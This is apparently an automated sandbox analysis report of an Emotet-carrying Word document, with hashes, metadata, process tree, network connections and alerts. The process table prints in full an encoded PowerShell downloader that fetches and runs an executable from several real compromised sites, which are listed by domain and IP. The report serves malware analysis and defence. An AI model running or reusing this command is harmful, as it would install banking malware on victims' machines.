File name: | Complaint N 0007142.doc |
Full analysis: | https://app.any.run/tasks/90359a1f-85f7-443e-90f2-0e166c65b019 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 08, 2019, 14:32:39 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Dorota Niedziela, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Oct 31 20:24:00 2019, Last Saved Time/Date: Thu Oct 31 20:24:00 2019, Number of Pages: 1, Number of Words: 41, Number of Characters: 237, Security: 0 |
MD5: | F41D84468D3D175D6711657F56280370 |
SHA1: | 041ED66ADB7DD0CE95C9B74C23B8996BB94667D2 |
SHA256: | 8A725F058DD90E254980A471BDC8D0761DFAC52274A1D6190B6E247E1D57889F |
SSDEEP: | 3072:dnKO9tkuH+UaqFh51r/SzFaSaQGBrjC48+WZ/POhh+/brjjQbRPo1c:dnKO9tkuHNaqjSzGQD48+aPOn6rjjawq |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 277 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Raczynski - Kopczynski |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 237 |
Words: | 41 |
Pages: | 1 |
ModifyDate: | 2019:10:31 20:24:00 |
CreateDate: | 2019:10:31 20:24:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Dorota Niedziela |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1296 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Complaint N 0007142.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2724 | PoWersHell -EncoD PAAjACAARQB0AGEAawBmAGsAawByAGcAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8AVAB4AGMAeQB5AGoAcwB4AGwAaABnAG8AIAAjAD4AIAAkAEoAdQBnAHgAZgBjAHAAYQByAD0AJwBWAHMAeABhAGMAdwBuAGsAagBjAGUAJwA7ACQAVgBiAHYAcgBkAHEAeQBlACAAPQAgACcANwAzADAAJwA7ACQASABmAGcAawB5AHkAZgB6AGQAPQAnAEQAdQBiAHcAZQBzAGcAeABrAGMAcQAnADsAJABBAHQAeAB3AGoAaAB3AGQAZABrAG0AbwB1AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABWAGIAdgByAGQAcQB5AGUAKwAnAC4AZQB4AGUAJwA7ACQASgBrAHQAZQBzAGYAZgBiAG4AcgB4AHcAaQA9ACcASABpAHcAcABjAGsAegBjAG0AbgBlAGsAJwA7ACQAWABkAHUAbQB1AGEAZgByAGcAbwBxAGEAaQA9ACYAKAAnAG4AZQB3AC0AJwArACcAbwBiACcAKwAnAGoAZQAnACsAJwBjAHQAJwApACAAbgBFAHQALgB3AEUAQgBDAEwAaQBlAE4AdAA7ACQAWgBvAHEAdQBtAGcAdQBtAD0AJwBoAHQAdABwADoALwAvAHMAcAByAGUAYQBzAC4AeAB5AHoALwB3AHAALQBhAGQAbQBpAG4ALwBTAGQAdgB3AHAAVgAvACoAaAB0AHQAcABzADoALwAvAHQAbwBwAHIAZQB2AGkAZQB3AHAAcgBvAC4AYwBvAC8AdwBwAC0AYQBkAG0AaQBuAC8AZABsADQALQByAHgANgBkADUAZABhAHkAbQB5AC0ANAAwADgANgA1AC8AKgBoAHQAdABwAHMAOgAvAC8AcwBvAHYAaQBuAHQAYQBnAGUALgB2AG4ALwB3AHAALQBhAGQAbQBpAG4ALwBZAHcAQgBhAEYAawAvACoAaAB0AHQAcABzADoALwAvAGIAYgBjAHAAcgBvAGQAdQBjAHQAcwAuAGkAbgAvAHcAcAAtAGEAZABtAGkAbgAvAGEATgBJAGoAZgB4AG0ARABFAC8AKgBoAHQAdABwADoALwAvAHAAbwByAHQAaQBhAHAAbABhAHkAZwByAG8AdQBuAGQALgBjAGEALwBjAGcAaQAtAGIAaQBuAC8AaAB6AGYAOQAyAHcALQBvAHEAcwAtADMAMwAvACcALgAiAFMAUABsAGAAaQBUACIAKAAnACoAJwApADsAJABJAGMAcgBrAGoAYgBuAGYAYQBoAHgAcQA9ACcAQwBkAHoAdwBiAG4AcQBiAGcAYQB0ACcAOwBmAG8AcgBlAGEAYwBoACgAJABZAHYAYQB4AGYAZABsAHEAeQAgAGkAbgAgACQAWgBvAHEAdQBtAGcAdQBtACkAewB0AHIAeQB7ACQAWABkAHUAbQB1AGEAZgByAGcAbwBxAGEAaQAuACIARABPAFcAYABOAEwAYABvAGEARABgAEYASQBsAEUAIgAoACQAWQB2AGEAeABmAGQAbABxAHkALAAgACQAQQB0AHgAdwBqAGgAdwBkAGQAawBtAG8AdQApADsAJABIAGcAcQBuAHUAaABnAGYAbwBnAD0AJwBQAGYAYgBoAHAAcgBsAHgAagBhAGkAbgBpACcAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQAQQB0AHgAdwBqAGgAdwBkAGQAawBtAG8AdQApAC4AIgBMAEUAYABOAEcAdABIACIAIAAtAGcAZQAgADIANgA4ADEAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYQBgAFIAVAAiACgAJABBAHQAeAB3AGoAaAB3AGQAZABrAG0AbwB1ACkAOwAkAEcAdwBxAHIAeABxAGcAeQBrAD0AJwBJAGgAawBuAHgAbwB4AG0AJwA7AGIAcgBlAGEAawA7ACQAVAByAGkAaABvAGIAaAB5AGQAZgBtAD0AJwBZAHMAcAB1AGIAeQB5AGQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUABkAHEAeQBtAGwAegBrAHcAYwBxAG0APQAnAEsAaQBwAHkAegBnAG8AcQBrACcA | C:\Windows\System32\WindowsPowerShell\v1.0\PoWersHell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
1296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA92B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AD6B31B0.wmf | — | |
MD5:— | SHA256:— | |||
1296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5E6DA5F1.wmf | — | |
MD5:— | SHA256:— | |||
1296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B038733E.wmf | — | |
MD5:— | SHA256:— | |||
1296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B1D68E27.wmf | — | |
MD5:— | SHA256:— | |||
1296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6657C1FC.wmf | — | |
MD5:— | SHA256:— | |||
1296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B5B41CD.wmf | — | |
MD5:— | SHA256:— | |||
1296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2CDF056A.wmf | — | |
MD5:— | SHA256:— | |||
1296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AAD58263.wmf | — | |
MD5:— | SHA256:— | |||
1296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7A761108.wmf | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2724 | PoWersHell.exe | GET | 302 | 89.252.141.53:80 | http://spreas.xyz/wp-admin/SdvwpV/ | TR | html | 593 b | suspicious |
2724 | PoWersHell.exe | GET | 200 | 89.252.141.53:80 | http://spreas.xyz/cgi-sys/suspendedpage.cgi | TR | html | 7.40 Kb | suspicious |
2724 | PoWersHell.exe | GET | 404 | 149.56.22.201:80 | http://portiaplayground.ca/cgi-bin/hzf92w-oqs-33/ | CA | html | 315 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2724 | PoWersHell.exe | 118.69.64.210:443 | sovintage.vn | The Corporation for Financing & Promoting Technology | VN | unknown |
2724 | PoWersHell.exe | 89.252.141.53:80 | spreas.xyz | Netinternet Bilisim Teknolojileri AS | TR | suspicious |
2724 | PoWersHell.exe | 104.27.170.151:443 | topreviewpro.co | Cloudflare Inc | US | shared |
2724 | PoWersHell.exe | 149.56.22.201:80 | portiaplayground.ca | OVH SAS | CA | malicious |
2724 | PoWersHell.exe | 208.91.198.106:443 | bbcproducts.in | PDR | US | suspicious |
Domain | IP | Reputation |
---|---|---|
spreas.xyz |
| suspicious |
topreviewpro.co |
| unknown |
sovintage.vn |
| unknown |
bbcproducts.in |
| malicious |
portiaplayground.ca |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2724 | PoWersHell.exe | Potentially Bad Traffic | AV INFO HTTP Request to a *.xyz domain |
2724 | PoWersHell.exe | Potentially Bad Traffic | AV INFO HTTP Request to a *.xyz domain |